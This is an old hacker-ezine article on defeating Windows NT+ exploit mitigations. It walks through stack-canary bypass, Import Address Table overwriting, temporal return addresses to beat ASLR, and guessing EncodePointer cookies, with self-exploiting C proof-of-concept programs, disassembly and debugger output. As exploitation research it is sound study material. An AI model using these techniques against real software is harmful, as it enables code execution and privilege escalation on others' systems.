.aware eZine Beta - Underground Research
β
Ω


[==============================================================================]
[-------[ Beating some counter-exploitation measures on WinNT+ systems ]-------]
[==============================================================================]


       _.d####b._
     .############.
   .################.
  .##################.__ __ __ __ _ _ __ __ 
  ##############/´_`|#\ V  V // _` | '_/ -_)
  ##############\__,|# \_/\_/ \__,_|_| \___|
  ###########>'<######                                     
  *#########(   )####* 
   ##########>.<#####    author:   Nomenumbra/[0x00SEC]
    ################     remember: http://www.bash.org/?753599
     *############*       
       "T######T"


--[ 0x00 ]--------------------------------------------[ Table Of Contents ]-----

  [ 0x00 ] Table Of Contents
  [ 0x01 ] Intro
  [ 0x02 ] IAT overwriting
  [ 0x03 ] Beating ASLR trough global static values and .idata disclosure
  [ 0x04 ] A look at the M$ Pointer hijacking protection api
  [ 0x05 ] Greetings 'n shoutz
  

--[ 0x01 ]--------------------------------------------------------[ Intro ]-----


Welcome, ladies and gentlemen, to this article - aimed at laying out a few 
relatively fresh (and some new) concepts and techniques for exploiting WinNT+ 
systems armed with counter-exploitation techniques. Sure, there are more areas 
to cover concerning this topic, but those have been dealt with, over and over 
again, whilst most of the stuff in this paper is either scarcely documented or 
new. I hope you'll enjoy your read.


--[ 0x02 ]----------------------------------------------[ IAT overwriting ]-----


The following program is a simple demonstration of how canary values work:

------------------------------------------------------------------------[SNIP]--
int main(int argc, char *argv[])
{
  unsigned char canary;        // canary value
  char buffer[256];
  char buffer2[289];
  canary = 0xAB;               // assign value
  memset(buffer,0x00,256);     // zero out the memory
  
  // construct evil buffer
  memset(buffer2,0x90,271);    // 256+12+3 (12+3 bytes is mingw compiler
                               // specific junk on my test box so it seemed)
  memset(buffer2+271,0xAB,1);  // canary
  memset(buffer2+272,0x90,12); // +12 bytes to EIP
  memset(buffer2+284,0xFF,4);  // eip
  strcpy(buffer,buffer2);
  
  if(canary != 0xAB)
  {
    printf("Canary corruption!\n");
    exit(0);
  }
  
  printf("You made it!\n");
  return 0;
}
------------------------------------------------------------------------[/SNIP]-

This is a pretty casual overflow with strcpy(0022FE60,buffer2);

    0022FE60 == start of dest buffer
    0022FF6F == canary location

If we take a look at what is between the end of the buffer (0022FF60) and the 
canary location (0022FF6F), we get the following dump:

    0022FF60  AD AE C0 77 38 07 91 7C  ­®Àw8‘|
    0022FF68  FF FF FF FF A8 FF 22     ÿÿÿÿ¨ÿ"

Now, 0x77C0AEAD is a memory address in msvcrt.dll and 0x7C910738 is a memory 
address in ntdll.dll - but they reference nothing in particular, so my guess is 
this is just mingw-specific junk, which we'll ignore. The main point is: Dealing 
with static canaries is trivial, as demonstrated above. But what if we used a 
randomized canary? Let's look at a slightly modified example:

------------------------------------------------------------------------[SNIP]--
int main(int argc, char *argv[])
{
  unsigned char saved_canary;
  unsigned char canary;
  char buffer[256];
  char buffer2[289];  
  srand(GetTickCount());
  saved_canary = (unsigned char)(rand()%0xFF);
  canary = saved_canary;
  memset(buffer,0x00,256);
  memset(buffer2,0x90,270);    // 256+12+2
  memset(buffer2+270,0xAB,1);  // canary
  memset(buffer2+271,0xAB,1);  // saved_canary
  memset(buffer2+272,0x90,12); // space in between
  memset(buffer2+284,0xFF,4);  // eip
  strcpy(buffer,buffer2);  	
  if(canary != saved_canary)
  {
    printf("Canary corruption!\n");
    exit(0);
  }
  printf("You made it!\n");
  return 0;
}
------------------------------------------------------------------------[/SNIP]-


As we can see, the canary value is compared to a saved_canary value, which makes 
this implementation downright stupid: The saved_canary can trivially be 
overwritten as well. Now what if we localize the saved_canary value somewhere 
else? Like this for example?


------------------------------------------------------------------------[SNIP]--
unsigned char saved_canary;

int main(int argc, char *argv[])
{
  unsigned char canary;
  char buffer[256];

  /* ... */
------------------------------------------------------------------------[/SNIP]-

Well, this can be solved by overwriting with a really long buffer:

    buffer address = 0x0022FE60
    saved_canary address = 0x00404060
    diff = 0x1D4200

Hence, buffer+diff = saved_canary. Note that this only works when all memory in
between is writable. However, memory isn't always writable, and a static NULL 
byte canary might be used.

In these situations, on Linux platforms, we can help ourselves with GOT
overwriting. For those unfamiliar with the attack, I'll give a short example.
Imagine the following app:

  char* ptr = NULL;
  char array[10];
  ptr = array;
  strcpy(ptr,argv[1]);
  printf("test one two three...\n");
  strcpy(ptr,argv[2]);
  printf("%s\n",ptr);
  
The basic idea is that we are somehow unable to overflow EIP (either by stack
protection or otherwise) and must overwrite the ptr value with a value of our
choice. Now, if we look closely at the example we can see that the first strcpy
can overflow array. If we overflow array and modify ptr with it, we can control
the destination address of the second strcpy, yielding an arbitrary write.

The Global Offset Table (GOT) redirects position independent address
calculations to an absolute location and is located in the .got section of an
ELF executable or shared object. To quote c0ntex on this:

"It stores the final (absolute) location of a function calls symbol, used in
dynamically linked code. When a program requests to use printf() for instance,
after the rtld locates the symbol, the location is then relocated in the GOT and
allows for the executable via the Procedure Linkage Table, to directly access
the symbols location."

Printf would look something like this:

    Location 1: call 0x80482b0 <printf>   (PLT)
    Location 2: jmp *0x8049550            (GOT)

Where location 2 is the GOT table entry.

If we manage to overwrite ptr with printf()'s GOT entry addr, we can modify the
entry and redirect execution of the following printf() to any address we want,
for example the libc function system() and then supply the name of a suid shell
as an argument.

Now, on Linux this is a pretty well-known technique, but that isn't the case for
its Windows equivalent. In fact, I haven't seen it being documented anywhere.

The PE file format equivalent of the GOT table is the IAT table. The IAT is used
as a lookup table when the application is calling a Windows API function.
Because a compiled PE DLL/EXE cannot know in advance where the other DLLs it
depends upon are located in memory, an indirect jump is required. As the dynamic
linker loads modules and joins them together, it writes jump instructions into
the IAT slots which point to the actual location of the destination function.
If we look at the disassembly of a simple application utilizing printf  we
can see the following:

00401376  |. E8 45050000    CALL <JMP.&msvcrt.printf>           ; \printf

Now, if we take a look at the destination of this call:

004018C0   $-FF25 04514000  JMP DWORD PTR DS:[<&msvcrt.printf>]  ; msvcrt.printf
004018C6     90             NOP
004018C7     90             NOP
004018C8     00             DB 00
004018C9     00             DB 00
004018CA     00             DB 00
004018CB     00             DB 00
004018CC     00             DB 00
004018CD     00             DB 00
004018CE     00             DB 00
004018CF     00             DB 00
004018D0   $-FF25 0C514000  JMP DWORD PTR DS:[<&msvcrt.strcpy>]  ; msvcrt.strcpy


As you can see, in this table we create a jump to the address located at
0x04514000. So the DWORD located at 0x04514000 is taken and that DWORD is
treated as an address to which we jump, the address of the printf function
prologue in msvcrt.dll. I will now present an example demonstrating IAT Table
hijacking.

This is a self-exploiting vulnerable app:

------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#define DIFF 28

// 0x7C81CDDA: ExitProcess kernel32.dll address
#define BUF2 "\xDA\xCD\x81\x7C"

char buffer[500];

int main(int argc, char **argv)
{
        char* pointer = NULL;
        char array[10];
        memset(buffer,0,500);
        memset(buffer,0x90,DIFF);
        strcpy(buffer+DIFF,"\x04\x51\x40\x00"); // printf IAT entry

        pointer = array;
        
        strcpy(pointer, buffer); // argv[1]
        printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
        strcpy(pointer, BUF2);
        printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
        return 0;
}
------------------------------------------------------------------------[/SNIP]-


As you can see, we overflow array by filling it with NOP bytes and overwriting
char* pointer with the address of the printf IAT entry (0x04514000). Once it's
overwritten, the second strcpy operation will copy the address of the
ExitProcess function located in kernel32.dll to the IAT slot of printf,
redirecting the next printf() call to ExitProcess. This technique is pretty
powerful, since it allows us to beat both non-executable stacks and canary
protection. Let me demonstrate this:


------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
// still 28, remember the mingw-specific compiler junk?
#define DIFF 28
#define BUF2 "\xDA\xCD\x81\x7C"
//0x7c81cdda exitprocess kernel32.dll address

unsigned char saved_canary;
char buffer[500];

void SomePrivilegedFunction() { }

int main(int argc, char **argv)
{
        char* pointer = NULL; // array + 28
        unsigned char canary; // array + 27
        char array[10];
                
        saved_canary = (unsigned char)(rand()%0xFF);
        canary = saved_canary;
        
        memset(buffer,0,500);
        memset(buffer,0x90,DIFF);
        strcpy(buffer+DIFF,"\xF8\x50\x40\x00"); // exit() IAT entry

        pointer = array;
        
        strcpy(pointer, buffer); // argv[1]                
        printf("[%s]\n",pointer);
        strcpy(pointer, BUF2);
        if(canary != saved_canary)
        {
          exit(0);
        }
        else
          printf("[%s]\n",pointer);
        return 0;
}
------------------------------------------------------------------------[/SNIP]-


This app, a modification of the previously shown app, is self-exploiting, too. 
Only this time, there is a canary value introduced and we will exit() if it 
doesn't match. The solution is obvious, we overwrite exit()'s IAT entry. But 
since we don't control the arguments, what good can come from overwriting it 
like this? Let us see:

00401387  |. 3A05 60404000  CMP AL,BYTE PTR DS:[404060]              ; |
0040138D  |. 74 0C          JE SHORT iathijac.0040139B               ; |
0040138F  |. C70424 0000000>MOV DWORD PTR SS:[ESP],0                 ; |
00401396  |. E8 55050000    CALL <JMP.&msvcrt.exit>                  ; \exit
0040139B  |> 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]             ; |

As we can see, the comparison located at 0x00401387 is followed by a conditional
jump to either the function exit or continuation of code execution flow at
0x0040139B.

So if we overwrite exit()'s IAT entry with, for example, the address of
SomePrivilegedFunction, we still fully control code execution flow. Hell, we can
supply the address of our buffer as well, potentially making it execute
shellcode (that is, on systems with an executable stack, else we'll have to
resort to pure api call replacement or code flow redirection). Also note that
this technique might be of use in combination with other attacks.

For example, when we cannot redirect code flow or supply a usefull API for
overwriting, we can still manipulate the program into unauthorized behavior in
another way, for example by overwriting the IAT entry of the exit() call, when
we know that this call is called after supplying a wrong password. We can then
overwrite the entry with the address of the code branch which is normally called
upon a successfull password check, elevating our privileges. Note that these
write-anything-anywhere situations might seem rare, but are far more common in
format-string exploits.



--[ 0x03 ]--------------------------[ Beating ASLR through global         ]-----
                                    [ static values and .idata disclosure ]

A recurring issue when it comes to reliable exploitation is that of finding a
decent return address. Usually we use an opcode configuration located in a
loaded module or (in some rare cases) located in the mapped executable memory
itself. However, when ASLR is involved, things tend to get a bit tricky, and if
we don't want to rely on prediction or bruteforce, we'll have to find another
way to locate a decent return address. Now, on linux systems, there is the old
linux-gate.so.1 technique. To quote izik's paper:

"'Linux-gate.so.1' is a dynamically shared object (DSO). It's life purpose is to
speed up and support system calls and signal/sigreturn for the kernel within the
user application. In particular it helps out handling a situation where a system
call accepts six parameters. This is when the EBP register has to be overwritten
and serve as the 6th parameter to the system call. Notice that this ties the
usage and need of linux-gate.so.1 to only linux kernels that are running under
ia32 and ia32-64 architectures."

Due to its nature, linux-gate.so.1 is always located at address 0xffffe000, so
we can search from 0xffffe000 to 0xffffeFFF for the desired opcode bytes to get
reliable return addresses.

On Windows however, there is no such thing as linux-gate.so.1 so we must look
for other statically located memory areas. Now let us consider timers and
counters, if we manage to find a timer or counter variable in memory, given its
range is big enough, we know that at a given time this counter/timer will
contain our opcode configuration (say we're looking for a jmp esp, which is
0xFFE4). Now, for using this technique in a reliable exploit we must know:

 0) The interval of the timer/counter
 1) The starting value of the timer/counter
 2) The range of the timer/counter
 3) The (static) address of the timer/counter

So say we have a given timer counting from a given date - January the 1st, 1970,
say. This timer has an interval of 1 second and a size of 4 bytes. Determening
the interval can be done in a number of ways, unless one already has knowledge
of the usage of said timer. One such method might be Skape's Telescope program
discussed in his "Temporal Return Addresses" article for uninformed. Now, if we
are on the same machine, exploiting a local vulnerability, determining local
time is trivial, but what to do when we are attacking a remote machine?

There are several techniques we can use to determine remote system time.

0) Using NetRemoteTOD in combination with NULL sessions.

   It is possible to use a standard windows API for determining the remote time.
   Doing so requires establishing a NULL session first. For those unfamiliar
   with the concept: http://rusecure.rutgers.edu/add_sec_meas/nullssn.php

   A small C example of code establishing a connection:
   
   NETRESOURCE nr;
	 nr.lpRemoteName = "\\\\server\\resource";
	 nr.dwType = RESOURCETYPE_DISK;
	 nr.lpLocalName = NULL;
	 nr.lpProvider = NULL;
   WNetAddConnection2(&nr,(LPSTR) szPassWord,(LPSTR) szUserName,0);

   Now fetching the remote time goes as follows:

   WCHAR wszNetbios[200];
	 TIME_OF_DAY_INFO *tinfo=NULL;
	 // convert string
      mbstowcs(wszNetbios, szServer, 200);
	 // return server time of day
      NetRemoteTOD(wszNetbios,(LPBYTE *)&tinfo);
          
   As you can see, the TIME_OF_DAY_INFO structure provides plenty of information
   for us to deal with: http://msdn2.microsoft.com/en-us/library/aa370959.aspx

1) ICMP TIMESTAMP 

   We can use the ICMP TIMESTAMP request to obtain the number of milliseconds
   since midnight UT. If we can obtain the timezone we can obtain the exact
   remote time. Obtaining the timezone can be done by performing an IP WHOIS
   lookup for example.

2) HTTP Server Date Header

   If a HTTPd is running on the target machine, we can potentially fetch the
   remote date from the HTTP header.

3) IP Timestamps Option

   Just like the ICMP TIMESTAMP request, IP also has a timestamp option that
   measures the number of milliseconds since midnight UT.


Now let us look at a special memory region found in all processes on Windows
NT+. This memory region, known as NTSharedUserData is always located at the same
static address, namely 0x7ffe0000. The structure looks like this on WinXP SP2:

   +0x000 TickCountLow     : Uint4B
   +0x004 TickCountMultiplier : Uint4B
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : Uint2B
   +0x02e ImageNumberHigh  : Uint2B
   +0x030 NtSystemRoot     : [260] Uint2B
   +0x238 MaxStackTraceDepth : Uint4B
   +0x23c CryptoExponent   : Uint4B
   +0x240 TimeZoneId       : Uint4B
   +0x244 Reserved2        : [8] Uint4B
   +0x264 NtProductType    : _NT_PRODUCT_TYPE
   +0x268 ProductTypeIsValid : UChar
   +0x26c NtMajorVersion   : Uint4B
   +0x270 NtMinorVersion   : Uint4B
   +0x274 ProcessorFeatures : [64] UChar
   +0x2b4 Reserved1        : Uint4B
   +0x2b8 Reserved3        : Uint4B
   +0x2bc TimeSlip         : Uint4B
   +0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
   +0x2c8 SystemExpirationDate : _LARGE_INTEGER
   +0x2d0 SuiteMask        : Uint4B
   +0x2d4 KdDebuggerEnabled : UChar
   +0x2d5 NXSupportPolicy  : UChar
   +0x2d8 ActiveConsoleId  : Uint4B
   +0x2dc DismountCount    : Uint4B
   +0x2e0 ComPlusPackage   : Uint4B
   +0x2e4 LastSystemRITEventTickCount : Uint4B
   +0x2e8 NumberOfPhysicalPages : Uint4B
   +0x2ec SafeBootMode     : UChar
   +0x2f0 TraceLogging     : Uint4B
   +0x2f8 TestRetInstruction : Uint8B
   +0x300 SystemCall       : Uint4B
   +0x304 SystemCallReturn : Uint4B
   +0x308 SystemCallPad    : [3] Uint8B
   +0x320 TickCount        : _KSYSTEM_TIME
   +0x320 TickCountQuad    : Uint8B
   +0x330 Cookie           : Uint4B

One of the purposes of SharedUserData is to provide processes with a global and
consistent method of obtaining certain information that may be requested
frequently. The reason why it's located at a static address is a design issue.
Prior to Windows XP, system calls were dispatched through the soft-interrupt
0x2E. From XP SP0 on however, they designed a way to support processor-specific
instructions for system calls, such as sysenter or syscall. To support this,
Microsoft added fields to the NtSharedUserData structure, namely the SystemCall
related fields. If we take a look at the disassembly of the data located at
NtSharedUserData.SystemCall on XP SP0 systems:

    7ffe0300 8bd4             mov edx,esp
    7ffe0302 0f34             sysenter
    7ffe0304 c3               ret

Those familiar with windows system calls will immediately recognize this as the
m$ way of calling NT syscalls. Hence why all syscalls preformed by Windows APIs
reference NtSharedUserData.SystemCall:

    mov  edx,0x7ffe0300
    call edx

Due to the fact that SharedUserData contained executable instructions, it was
thus necessary that the SharedUserData mapping had to be marked as executable.
However, starting from XP SP2 and 2003 SP1 they realized that this might pose a
security risk (O RLY?) So instead of positioning executable instructions there,
they replaced them with pointers, as seen on XP SP2 systems:

    +0x300 SystemCall       : 0x7c90eb8b
    +0x304 SystemCallReturn : 0x7c90eb94

So all syscall stubs were changed like this:

    mov     edx,0x7ffe0300
    call    dword ptr [edx]

The address referenced by the NtSharedUserData.Syscall is the address of
ntdll.KiFastSystemCall, which is the same code stub previously located at
NtSharedUserData.Syscall. Now all WinNT+ systems up to XP SP2 and win2k3 SP1
have an executable SharedUserData, which makes it perfectly suited as a static
return address location. As we discussed earlier, we can use timer variables as
a return address location, and SharedUserData has three of them, namely:

   +0x000 TickCountLow     : Uint4B
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   
Now, let us look at them with our prerequisites for a good temporal return
address in mind. Let us first look at TickCountLow. TickCountLow is used, in
combination with TickCountMultiplier to calculate the number of milliseconds
since boot like this:

MilliSeconds = TickCountLow * TickCountMultiplier >> 24

Because the initial value is unknown to us, and the update interval may vary
among different hardware architectures, this value is quite unreliable. We can
however, use the TCP timestamping technique to determine the current value and
interval.

The InterruptTime value stores a 100 nanosecond counter couting the amount of
time spent processing system interrupts. Due to its unpredictable nature, both
regarding interval and initial value, this variable is virtually unusable.

The SystemTime value is a 100 nanosecond counter measured from Jan. 1, 1601.
This time is relative to the timezone the target machine is using. So if we
obtain that information, we can use the SystemTime value as a very usefull
temporal return address.

Now, the last step is to calculate the exact point of time when the target
variable will contain a valuable opcode. Let us consider a 32 bit double word
initialized with 0x00000000 at a given time, being continually incremented by Z
at an interval of X. Now, there are plenty of useful opcodes, including jmp/call
esp, pop/pop/ret for SEH overwrites, and so forth. Let's consider a trivial jmp
esp, which is 0xFFE4. Also let our target variable be located at address Y,
giving us 5 opcode occurrences during a full loop:

 1) 0xFFE4<UUUU>
 2) 0x<U>FFE4<UUU>
 3) 0x<UU>FFE4<UU>
 4) 0x<UUU>FFE4<U>
 5) 0x<UUUU>FFE4
 
where U is any byte. The first time, 0xFFE4<UUUU> is reached after a time of
((0xFFE40000 * X)/Z) and lasts for 

   (((0xFFE50000-0xFFE40000-1)*X)/Z) =  ((0xFFFF * X)/Z).
    
Given this technique, we can calculate the exact time and time window of valid
opcode occurrences.

Another interesting trick becomes applicable when exploiting a format string bug
yielding a read-anything from anywhere situation. Since .idata includes the
import directory as well as the import address name table and is statically
located, we can deduce the address of any given function. For every imported
module there is a special structure in the .idata section (as worked out by
Caolan McNamara):

    typedef struct tagImportDirectory
        {
        DWORD    dwRVAFunctionNameList;
        DWORD    dwUseless1;
        DWORD    dwUseless2;
        DWORD    dwRVAModuleName;
        DWORD    dwRVAFunctionAddressList;
        }IMAGE_IMPORT_MODULE_DIRECTORY,
         * PIMAGE_IMPORT_MODULE_DIRECTORY;

Each one of these entries points to information for the given imported module.

dwRVAFunctionNameList is a relative virtual address that points to a list of
RVAs, each pointing to the null-terminated string of an imported function name.
The dwUseless DWORDS are simply padding area. dwRVAModuleName is a relative
virtual address that points to the module name.

dwRVAFunctionAddressList is a RVA pointing to a list of RVAs that will be loaded
upon PE loading time. This list contains the addresses of the loaded functions.
Now, by using a read-anything-from-anywhere situation, we can read from this
statically located dwRVAFunctionAddressList to deduce the address of an imported
function. If we then substract the correct offset, which isn't randomized, we
can obtain the base address for the given randomized module and beat ASLR in
this fashion.



--[ 0x04 ]------------[ A look at the M$ Pointer hijacking protection API ]-----


Somewhere in 2006, Michael Howard blogged about Microsoft's EncodePointer /
EncodeSystemPointer APIs which where designed to make pointer hijacking more
difficult. Now, for those who don't know what pointer hijacking is, it's
actually pretty simple, given a vulnerable function:


------------------------------------------------------------------------[SNIP]--
int VulnFunc(char *szString) {

  DWORD fp;
  char buf[32];
  strcpy(buf,szString);
  fp = (DWORD)&SomeFunc;
  #ifdef DEBUG
    printf("[*] fp == 0x%04x\n",fp);
  #endif

  strcpy(buf,szString);

  #ifdef DEBUG
    printf("[*] fp == 0x%04x\n",fp);
  #endif
  if (fp)
    (*(void (*)(void)) fp)();
  return 0;
}
------------------------------------------------------------------------[/SNIP]-


Now, this simple stack overflow would usually be exploited by casually
overwriting EIP. But what if, for some reason, we can't supply a big enough
string (szString is too small for example)? Well, in that case we could
overwrite the fp pointer and gain control of code execution flow that way, upon
execution of (*(void (*)(void)) fp)(). Example:

When running the function using szString = "test" we get the following output:

[*] fp == 0x401290
[*] fp == 0x401290

When supplying a buffer of "\x90"x44,"\x41"x4 we get the following output:

[*] fp == 0x401290
[*] fp == 0x41414141

Now, starting from Windows XP SP2 and Windows Server 2003 SP1, M$ supplies us
with the EncodePointer / DecodePointer and EncodeSystemPointer APIs. These
functions encode the pointer and decode it before usage, adding a layer of
security when using long-lived pointers. A small example:


------------------------------------------------------------------------[SNIP]--
int Functionlol(char *szString) {

  DWORD fp;
  DWORD fp2;
  char buf[32];
  
  fp = (DWORD)&SomeFunc;
  fp2 = 0xCAFEBABE;

  #ifdef DEBUG
  printf("[*]Before encoding of fp:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif

  fp = (DWORD)(*(PVOID (*)(PVOID)) EncodePointer)(&SomeFunc);

  #ifdef DEBUG
  printf("[*]After encoding of fp and before b0f:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif

  strcpy(buf,szString);

  #ifdef DEBUG
  printf(
    "[*]After encoding of fp and after b0f, before decoding of fp to fp2:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif

  fp2 = (DWORD)(*(PVOID (*)(PVOID)) DecodePointer)((void*)fp);

  #ifdef DEBUG
  printf("[*]After decoding of fp to fp2:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif
  
  if (fp2)
    (*(void (*)(void)) fp2)();
  return 0;
}
------------------------------------------------------------------------[/SNIP]-


Note that I loaded EncodePointer and DecodePointer directly from kernel32.dll
using GetProcAddress. Let us see how this works out:

When setting szString = "test"

[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0x401290

As we can see, fp gets neatly encoded and eventually decoded to fp2.
Now, when attempting a buffer overflow attack:

[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x90909090
[*]After decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x88119145

As we can see, fp gets encoded and eventually overwritten with 0x41414141. The
problem lies in the fact that this value gets decoded to fp2, resulting in a
false address. EncodeSystemPointer / DecodeSystemPointer work in exactly the
same manner, with one major difference. EncodePointer uses a per-process
randomized value, whilst EncodeSystemPointer uses a system-wide unique value.

Interesting ... but how do these functions work exactly?

Let us first look at EncodeSystemPointer, since this function is the least
secure. EncodeSystemPointer is located at 0x7C91AFC8 in kernel32.dll on my box,
which disassembles to:

7C91AFC8 > 8BFF             MOV EDI,EDI
7C91AFCA   55               PUSH EBP
7C91AFCB   8BEC             MOV EBP,ESP
7C91AFCD   A1 3003FE7F      MOV EAX,DWORD PTR DS:[7FFE0330]
7C91AFD2   3345 08          XOR EAX,DWORD PTR SS:[EBP+8]
7C91AFD5   5D               POP EBP
7C91AFD6   C2 0400          RETN 4

Obviously DecodeSystemPointer is exactly the same as EncodeSystemPointer, since
the function is basically a XOR of the pointer with a certain "magic value"
DWORD located at 0x7FFE0330. What lies there? Well, this is a certain value in
SharedUserData (_KUSER_SHARED_DATA), indeed, the SharedUserData region  we
discussed in section [0x02]. As we can see, the value referred to in the
EncodeSystemPointer code is  0x7FFE0330, which is  the base address  of
SharedUserData + 0x330, which is the Cookie offset. This cookie is a magic value
which changes on reboot.

All processes have access to this Cookie, no matter what privileges. So local
attacks wouldn't be a problem since the exploit program would simply check the
value of *(DWORD*)(0x7ffe0330) and XOR the desired pointer overwrite address
with this cookie. Also, due to the static nature of this value during uptime,
eventually guessing it through bruteforce would be possible too.

Now let us look at EncodePointer.
EncodePointer is located at 0x7C913917 in kernel32.dll on my box:

Disassembly:

7C913917 > 8BFF             MOV EDI,EDI
7C913919   55               PUSH EBP
7C91391A   8BEC             MOV EBP,ESP
7C91391C   51               PUSH ECX
7C91391D   6A 00            PUSH 0
7C91391F   6A 04            PUSH 4
7C913921   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-4]
7C913924   50               PUSH EAX
7C913925   6A 24            PUSH 24
7C913927   6A FF            PUSH -1
7C913929   E8 EDA6FFFF      CALL ntdll.ZwQueryInformationProcess
7C91392E   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
7C913931   3345 08          XOR EAX,DWORD PTR SS:[EBP+8]
7C913934   C9               LEAVE
7C913935   C2 0400          RETN 4

DecodePointer:

7C91393D > 8BFF             MOV EDI,EDI
7C91393F   55               PUSH EBP
7C913940   8BEC             MOV EBP,ESP
7C913942   5D               POP EBP
7C913943  ^EB D2            JMP SHORT ntdll.RtlEncodePointer


As we can see DecodePointer is once again simply EncodePointer. Now, what
EncodePointer does is pretty simple, it makes a call like:

ntdll.ZwQueryInformationProcess(-1,24,dword ptr ss:[ebp-4],4,0)

Which is a simple query of ProcessSessionInformation (0x24) for the calling
process (0xFFFFFFFF == -1 == CurrentProcess handle). The returned value is the
ProcessSessionID of the ProcessEnvironmentBlock (PEB), as can be confirmed by
looking at the ReactOS (OpenSource WinNT compatible implementation) kernel
source for ZwQueryInformationProcess:
 
     case ProcessSessionInformation:
     /* ... */
     /* Enter SEH for write to user-mode PEB */
     _SEH_TRY
     {
         /* Write the session ID */
         Process->Peb->SessionId = SessionInfo.SessionId;
     }
                
Now this value is pretty tricky due to it's very random nature, but apperently
it's constructed in the following manner upon process creation.

  o The higher portion of the system tick count 
    (100 nano-second tick count since Jan 01, 1601)        XOR
  o The lower portion the system tick count                XOR
  o The interrupt time (number of ticks during interrupts) XOR
  o The number of system calls since system boot           XOR
  o The (ULONG)rdtsc CPU value                             XOR
  o The memory manager page fault count 

This result is then rotated right on encode using Cookie%(sizeof(ULONG_PTR)*8).
In pseudocode on a 32-bit CPU, encoding looks like this:

  Ptrenc = (Ptrclear ^ Cookie) >>> (Cookie % 32) 

The reason for the rotation is to make it harder to target partial pointer
overwrites, because target bits are in an unknown position in the encoded
pointer. Now we could simply bruteforce this value but there are ways to be more
efficient in our bruteforce. If we could determine any of the values used for
SessionID generation, bruteforcing would be a tad easier, because if with:

 (w ^ x ^ y ^ z ^ a ^ b)

w and x are known (or approximated), it leaves us with less to bruteforce. Now,
we can attempt to determine these values remotely through uptime fingerprinting.
If we can determinte the target machine's uptime, we can approximate the first
two values.

Locally  determining  the  system uptime  is  possible  by calling  the
NtQuerySystemInformation native API with the SystemTimeOfDayInformation system
information class, this will return the system boottime in 100 nanosecond
intervals, from which determining the system uptime is trivial.

Remotely determining uptime is possible through the TCP Timestamps Option
(TSopt) described in RFC 1323. This is possible because the way operating
systems manage their TCP timestamping allows a remote client to guess, if he
recognizes the operating system through OS fingerprinting, the machine's
uptime. BSD, for example, increments the timestamp value by one point each 500
milliseconds. The optional TCP field looks like this:

    1        1             4                         4
   +--------+-------------+-----------------------+--------------------------+
   | Kind=8 |   size=10   |   TS Value (TSval)    | TS Echo Reply (TSecr)    |
   +--------+-------------+-----------------------+--------------------------+


We need to keep in mind the following things though:

The length of a timestamp value in a TCP packet is 4 bytes, so it will roll over
when the value crosses the limit of 2^32. Also windows does not instantly start
to increase the timestamp once the system has been booted up. nmap uses this
technique and does pretty well (for windows as well, despite the aforementioned
issue), so if you're interested in implementing this as a function in your
exploit trying to beat EncodePointer secured applications, you should take a
look at nmap's uptime guessing routines.

The rdtsc CPU value is simply a timestamp counter which represents the count of
ticks from processor reset.

So if we manage to obtain the uptime, and we can safely assume uptime and
process creationtime are close to each other, we can make an approximation of at
least 3 values remotely.

Now these techniques are not very accurate, but might help you  exploit
applications employing pointer encoding.



--[ 0x05 ]------------------------------------------[ Greetings 'n shoutz ]-----

Greets and shouts go to Nullsec, the whole .aware/xzziroz community, The
HackThisSite collective, RRLF, 29A, The entire SmashTheStack crew, PullThePlug ,
BinaryShadow Organization, #dutch crew, Vx.netlux folks/Undernet VX crew,
blacksecurity and all "true" hackers out there.

This page is part of the .aware network. Content and design © 2004 - 2010 .aware network
Due to certified insanity, we are not responsible for anything, period.